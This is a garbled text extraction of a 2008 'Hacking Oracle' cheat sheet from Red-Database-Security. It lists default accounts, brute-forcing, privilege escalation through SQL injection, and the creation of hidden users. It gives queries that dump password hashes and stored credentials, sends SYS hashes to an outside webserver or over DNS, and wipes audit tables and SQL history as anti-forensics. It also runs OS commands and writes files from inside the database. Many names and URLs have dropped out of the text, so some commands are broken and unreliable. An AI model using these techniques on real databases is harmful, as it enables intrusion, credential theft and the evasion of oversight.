Oracle Security Cheat Sheet - Red-Database-Security

1 XMLDB installed and active ( : dispatchers='(PROTOCOL=TCP) (SERVICE=<ORACLE_SID>XDB)')Port 2100(FTP), Port 8080 (HTTP) Buffer Overflow via long FTP or HTTP Password(published, Metasploit-exploit) Buffer Overflow via long FTP username(unpublished, no published exploit avaiable)ONS installed(onsctl startPort 6200, <= ) R19i R210g R110g R2 TNS-Listener without Password / ADMIN_RESTRICTIONAmap against port 6200 crashes the ONS serviceR*services installed( create file .rhosts unix/mac: : )No R*services installed( create file unix/mac: : )Hacking Oracle -Version - 29-Jan-200811g R1 Modify / $ account(create a user with the name of OPS$ and login without pw)Simple file sharing(connect to a DB running on Windows XP with Simple File Sharing)Insert code like grant dba to user Oracle rdspw /addSqlplus /@ip/sid as sysdbaOCI-Connection(TNS Listener available (default 1521))SID unknownXMLDBO racle 7-9i R2(lsnrctl status ip) + Listener PasswordorOracle 10g R1/R2(use sidguess to bruteforce SID) Oracle account unknownBrute-force accounts( with hydra against FTP (2100), dbsnmp, outln, sys, system)SID knownOracle account knownBrute-force accounts( with hydra against HTTP (8080), dbsnmp, outln, sys, system)

2 SQL Injection via xmldb & transform(use lowprivileged user to get DBA privileges)until accounts( dbsnmp/dbsnmp, outln/outln, sys/change_on_install, system/manager) Oracle account unknownOracle account knownEscalate privileges if not DBA( with CPU Jan 2006)Patch and login or R1 Use SQL injection in Oracle packages, $MCPC hange public synonym dbms_assert and inject sql codeSQL Injection DBMS_EXPORT_EXTENSION(fixed with CPU July 2006)Update selectable tables via specially crafted inline views(fixed with CPU October 2006)Update selectable tables via specially crafted views(fixed for 10g R2 with CPU Juli 2007) Oracle 10g R1/R2(use Database/Grid/Auditvault Control/em/console)Hacking Oracle -Version - 29-Jan-2008(via SQL Injection in webapp) Oracle 9iR2 - 11g (select global_name from global_name)10g 11guse utl_tcp to modify TNS-Listener settings (change via )10g 11gdbms_scheduler & run sqlplus / as sysdba Privilege escalation in vulnerable 3rd-party / customer codeThis is only a small subset of possiblities to become DBASQL*Plus Commands (not always supported in other clients like TOAD, SQL*Navigator.)

3 Connect with easy connect:sqlplus works only with Oracle 10g/11g execute a SQL Script from a HTTP server (FTP is also possible)show parameter -- show all parameters of the databaseshow parameter audit-- show audit settingsset term off-- disable terminal outputset term on-- enable terminal outputSet heading off-- disable headlinesSet pagesize 0-- disable pagesizeSet timing on-- show execution timeSet autocommit on-- commit everything after every command (!dangerous!)host /c 0wned > c:\ -- run OS commands from sqlplus (on the client), Instead of host the shortcuts ! (unix) or $ (Windows) are also possibleset serveroutput on -- enable output from dbms_outputspool c:\ create a logfile of the SQL*Plus Session called (disable: spool off)desc utl_http-- show package specification of utl_httpdesc all_users-- show view specification of all_usersHacking Oracle -Version - 29-Jan-2008 Useful Tools / Links:checkpwd: -- fastest multiplatform Oracle dictionary password fastest Oracle Brute Force get a list of application password + search for a specific string in the analyse Oracle listener ~jwa/hacks/ Security /tnscmd/tnscmd-- control unprotected TNS Listener without Oracle Clientsidguess: fastest Oracle dictionary password crackerOracle Assessment Kit.

4 Useful tools, to exploit the alter session bugOracle Instant Oracle Instant ClientOracle SQL GUI Tool for Oracle in JavaBacktrack 2 Linux Live CD with many Oracle Security ToolsCreate Oracle User:With create user cmd:create user user1 identified by rds2008; grant dba to user1;-- Password send in cleartext over the networkWith create role cmd:create role user1 identified by rds2008; update $ set type#=1 where name= USER1';-- Create a role and change the type. Not auditedWith grant:grant dba to user1 identified by rds2008;-- Privilege granted, User will be created if not existingWith grant:grant connect to user1,user2,user3,user4 identified by user1,user2,user3,user4;-- Password send in cleartext over the networkInvisible User:update $ set type#=2 where name= USER1';-- Hide an user in the views dba_user/all_users, no view modification ncessaryDifferent ways to change Oracle Passwords:With SQL*Plus Password cmd:password system;-- Password not send in cleartextWith Alter user cmd:alter user system identified by rds2008;-- Password send in cleartext over the networkWith Alter user cmd:alter user system identified by values '737B466C2DF536B9.

5 -- Set a password hash directlyWith grant:grant connect to system identified by rds2008;-- Password send in cleartext over the networkWith update:update $ set password = '737B466C2DF536B9' where name= SYSTEM ;-- Unsupported, not auditable, flush of the dictionary cash necessary (alter system flush shared_pool;)Get Patch Level:Get Patchlevel via opatch: opatch lsinventory;-- Get the patchlevel via opatch (on DB server, OS level)Get Patchlevel via SQL:select * from dba_registry_history;-- Get last CPU appliedInformation Retrieval:Get version:select * from v$version-- all usersGet Security patchlevel:select * from dba_registry_history;-- only DBA, 9i+, empty or non existing table= no Security Patch Installed database components:select * from dba_registry;-- only DBAGet userlist:select * from all_users;-- all usersGet user & PW hashes(7-10g):select username,password,account_status from dba_users;-- only DBA until 10g R2 Get user & PW hashes(11g/10g):select name,password,spare4,accountstatus from $, where user#=user_id;-- only DBA 11g R1 Get Apex password hashes:select user_name, web_password_raw from ;-- only DBA, 030000 = APEX version , 020100= Apex password hashes:select user_name, (' '||web_password_raw|| &b=MD5-Search ) -- only DBA, requires internet access from the databasefrom ;Get Metalink account/password:select (aru_username), (aru_password) from.

6 -- only DBA, 10gGet password of mgmt_view_user select view_username, (view_password) from ;-- only DBA, 10gGet passwords of DB/Grid control: select credential_set_column, (credential_value) from ;--only DBA, 10gTDE encrypted tables:select table_name,column_name,encryption_alg,sa lt from dba_encrypted_columns;-- only DBA, 10g 11gShow code using encryption:select owner, name, type, referenced_name from all_dependencies where referenced_name -- show objects using database encryption ( for passwords)IN ('DBMS_CRYPTO', 'DBMS_OBFUSCATION_TOOLKIT')Already DBA?desc dba_users-- only possible if DBA (or select any dictionary), not auditedGet system privileges:select * from user_sys_privs;-- show system privileges of the current userGet role privileges:select * from user_role_privs;-- show role privileges of the current userGet table privileges:select * from user_tab_privs;-- show table privileges of the current userGet interesting tables:select table_name,column_name,owner from dba_tab_columns where ((upper(column_name) -- show tables with columns containing the string 'PWD.))

7 Like '%PWD%' or upper(column_name) like '%PASSW%' or upper(column_name) like '%CREDEN%' or -- the scripts is checking all objectsupper(column_name) like '%AUTH%'))Get tables with run the SQL script a list of all Oracle directories:select * from dba_directories;-- show Oracle directoriesAccess SQL history (v$sql):select sql_text from $sql where lower(sql_text) like '%utl_http% ;-- search all SQL statements in the database containing the string utl_httpAccess SQL history (wrh$_sqltext): select sql_text from $_sqltext where lower(sql_text) like '%utl_http% ;-- search all SQL statements containing the string utl_httpCheck, if audit_sys_operations:select name,value from v$parameter where name = 'audit_sys_operations';-- check if commands submitted by SYS are auditedCheck for database trigger:select owner,trigger_name from dba_triggers where trigger_type='AFTER EVENT ;-- check for logon, dll or startup/shutdown triggerSearch strings in tables (dbgrep) run the SQL script (from RDS))Get information from run the SQL script (from RDS) Web Access:Web access via utl_http:select (' ) from dual;-- all users,, 8-10g R2 Web access via httpuritype:select httpuritype( ' ' ).

8 Getclob() from dual;-- all users,, 8-10g R2 Send password hash to webserver: select (' ||(select username|| = ||password from dba_users -- only DBA, change value of username for other userswhere username= SYS )) from dual;Send password hash to webserver: select httpuritype(' ||(select username|| = ||password from dba_users -- only DBA, change value of username for other userswhere username= SYS )).getclob() from dual;Send password hash via DNS: select ('http://www. ||(select username|| = ||password from dba_users -- only DBA, change value of username for other userswhere username= SYS )|| . ) from dual;Hacking Oracle -Version - 29-Jan-2008 Anti-Forensics:Clear v$sql:alter system flush shared pool;-- only DBA, all versionsClear :truncate table $_sqlstat;-- only DBA, 10g/11gClear audit-Table:truncate table $;-- only as SYS, all versionsClear audit-Table:delete table $;-- only, all versionsChange object creation date:update $ set ctime=sysdate-300, mtime=sysdate-300, stime=sysdate-300 where name='AUD$'; -- change the creation date of an objectRun OS Commands via dbms_scheduler:(10g/11g only)-- Create a Program for dbms_schedulerexec ('RDS2008','EXECUTABLE','c:\WINDOWS\syst em32\ /c echo 0wned >> c:\ ',0,TRUE).

9 -- Create, execute and delete a Job for dbms_scheduler exec (job_name => 'RDS2008 JOB',program_name => 'RDS2008',start_date => NULL,repeat_interval => NULL,end_date => NULL,enabled => TRUE,auto_drop => TRUE);-- delete the programexec (PROGRAM_NAME => 'RDS2008');-- Purge the logfile for dbms_scheduler--exec ;Hacking Oracle -Version - 29-Jan-2008 Write Binary Files via utl_file:Create or replace directory EXT as 'C:\ ;DECLARE fi ; bu RAW(32767); BEGIN bu:=hextoraw('BF3B01BB8100021E8000B88200 882780FB81750288D850E8060083C402CD20C355 89E5B80100508D451A50B80F00508D5D00 FFD383C40689EC5DC3558 BEC8B5E088B4E048B5606B80040CD21730231C08 BE55DC39048656C6C6F2C20576F726C64210D0A' );fi:= ('EXT',' ','w',32767); (fi,bu,TRUE); (fi);END;/Write Text Files via dbms_advisor:(10g/11g, requires the privilege advisor)Create or replace directory EXT as 'C:\ ;grant advisor to user1;exec ( 'hacked', EXT, ' ' )Write Text Files via utl_file:Create or replace directory EXT as 'C:\ ;DECLARE v_file ;BEGIN v_file := ('C:\',' ', 'w'); (v_file,'first row'); (v_file); (v_file,'second row'); (v_file); END; Read Files via Java:grant javasyspriv to user1;CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVAREADFILE" ASimport *;import *;public class JAVAREADFILE{public static void readfile(String filename) throws IOException{FileReader f = new FileReader(filename);BufferedReader fr = new BufferedReader(f);String text = ();;while(text !)}}

10 = null){ (text);text = ();} (); }};CREATE OR REPLACE